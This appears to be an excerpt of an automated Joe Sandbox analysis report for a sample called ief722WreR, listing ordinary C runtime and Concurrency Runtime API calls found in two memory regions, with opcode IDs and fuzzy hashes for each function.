                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction ID: 924b2012034765f75be822235018525e58794493cc26a8d2fd43b45b17ca7db3
                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction Fuzzy Hash: EA01C47A504149BBDF139E94EC828AE3F66AF6E350F088517F91884170D732C6B1EF85
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                        • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                        • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                      • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                      • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                      • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                        • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                        • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                      • GetLastError.KERNEL32 ref: 00413541
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                        • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                      • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                      • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0249378C
                                                        • Part of subcall function 02492B16: ___crtGetTimeFormatEx.LIBCMT ref: 02492B2C
                                                        • Part of subcall function 02492B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02492B4B
                                                      • GetLastError.KERNEL32 ref: 024937A8
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024937BE
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024937CC
                                                        • Part of subcall function 024928EC: SetThreadPriority.KERNEL32(?,?), ref: 024928F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                      • Instruction ID: 8622be4b170f9abb9ea511820c72f3ce94b38cb5fe23583529433e6e242052c8
                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                      • Instruction Fuzzy Hash: 5EF0A7B2A002153ADB20FB765C0AFBB3EAC9B11B51F50496FB905E6181EED9D4048AB5
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02491342
                                                        • Part of subcall function 02490BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02490BD6
                                                        • Part of subcall function 02490BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02490BF7
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02491355
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02491361
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0249136A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                      • Instruction ID: 56b10c06773fd70edfe384cd871a397b27aa1454853719aef869861930285ec3
                                                      • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                      • Instruction Fuzzy Hash: 37F0B431640716ABAF247EBA081197E39A79F51314B04416FD51A9F3C0DFB19E019A94
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0249D088
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0249D0AC
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249D0BF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0249D0CD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID:
                                                      • API String ID: 3657713681-0
                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                      • Instruction ID: c2c36d04806251c681300089731a32846e2a6f0cdfc95268f4f24ee9a765d5f3
                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                      • Instruction Fuzzy Hash: EEF05235E00204E7CF24FB62D840CAEBB7A9E90B18760852FD80517285DF31A90ACEA2
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                      • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                      • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                      • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 02485A83
                                                      • __Cnd_signal.LIBCPMT ref: 02485A8F
                                                      • std::_Cnd_initX.LIBCPMT ref: 02485AA4
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02485AAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                      • Instruction ID: 7562e23720ca14c0881c1d58a19b0123a80bd25dcea8da757555e7901b0e7e6e
                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                      • Instruction Fuzzy Hash: B2F0E531520700EFEF227B73D80571E77A2AF01328F54482FE15A969A0CFBAE8558E55
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0249286F
                                                      • GetLastError.KERNEL32(?,?,?,?,02498830,?,?,?,?,00000000,?,00000000), ref: 0249287E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492894
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024928A2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                      • Instruction ID: aec0aaa7c62f9fe8312bde4c062f1fbaf414c32f16c8700e1188f910ade556e2
                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                      • Instruction Fuzzy Hash: 0FF0A03490010ABBCF00EFA5CD44EAF3BBCAB00B01F200616B910E20A0DB74D6049B64
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                      • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                      • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 02492593
                                                      • GetLastError.KERNEL32(?,?,?,?,?,02490DA0), ref: 024925A1
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024925B7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024925C5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                      • Instruction ID: c27784b29f73ed2c89e834a075d5c1cdddc6492e16024abb30fdb0025740cf24
                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                      • Instruction Fuzzy Hash: DFE0D871A0021639EB10F7B64C12F7F3A9C9B10B41F44085BBD14E51C1FED4D10049A4
                                                      APIs
                                                        • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                      • GetLastError.KERNEL32 ref: 00423991
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                      • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                      • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                      APIs
                                                        • Part of subcall function 02492959: TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
                                                      • TlsAlloc.KERNEL32(?,02490DA0), ref: 024A3BE6
                                                      • GetLastError.KERNEL32 ref: 024A3BF8
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A3C0E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A3C1C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                      • Instruction ID: 1ba54625472139bf85578ddc668998a8cdbcdc7dec36a2a7e15fa6a4bcc1ea00
                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                      • Instruction Fuzzy Hash: CDE02274500202AFCB00BF769CA9A7A7E69AA107017100A6BE925D21A1FA34D0068E68
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                      • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                      • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02490DA0), ref: 0249279E
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02490DA0), ref: 024927AD
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024927C3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024927D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                      • Instruction ID: 10975cf8d30a9dc56dda0ca23f26f8eaecd1c76986fdd7eab6668915f680aa8b
                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                      • Instruction Fuzzy Hash: E4E08074900109B7CF00FBB5DD45EAF77BC6A00B05B600566A501F3150EB65D7048B75
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                      • GetLastError.KERNEL32 ref: 0041269D
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                      • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                      • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                      • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                      • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 024928F8
                                                      • GetLastError.KERNEL32 ref: 02492904
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0249291A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02492928
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                      • Instruction ID: 97b46cdfd56066b73664fa90e266908f4a3d7342817f65d22067273f228c63ed
                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                      • Instruction Fuzzy Hash: D7E086346001097BCF14FF72CC45FBB3B6CBB00B45B50092ABC15D20A1EF75D1048A98
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,02497BD8,00000000,?,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929BE
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024929CA
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024929E0
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024929EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                      • Instruction ID: c633e706738ef8ec576eb7664d22cfd30d45f5d3827684387e1aae06fce61679
                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                      • Instruction Fuzzy Hash: A0E04F746001097ADF10FF618C48BBB3A6CAB00B45B50092AB919D10A0EB75D1149AA8
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                      • GetLastError.KERNEL32 ref: 00412705
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                      • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                      • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
                                                      • GetLastError.KERNEL32 ref: 0249296C
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492982
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02492990
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                      • Instruction ID: 39b89da5196754ac7e66ba7afbf2fb2fdc32eb80da0eee6845f7c8a3fde144f0
                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                      • Instruction Fuzzy Hash: 62E0C2305001057B8B14FBB99C48A7B36AC6A01B15B600B2BF861E20E0EBA8D1084AA8
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
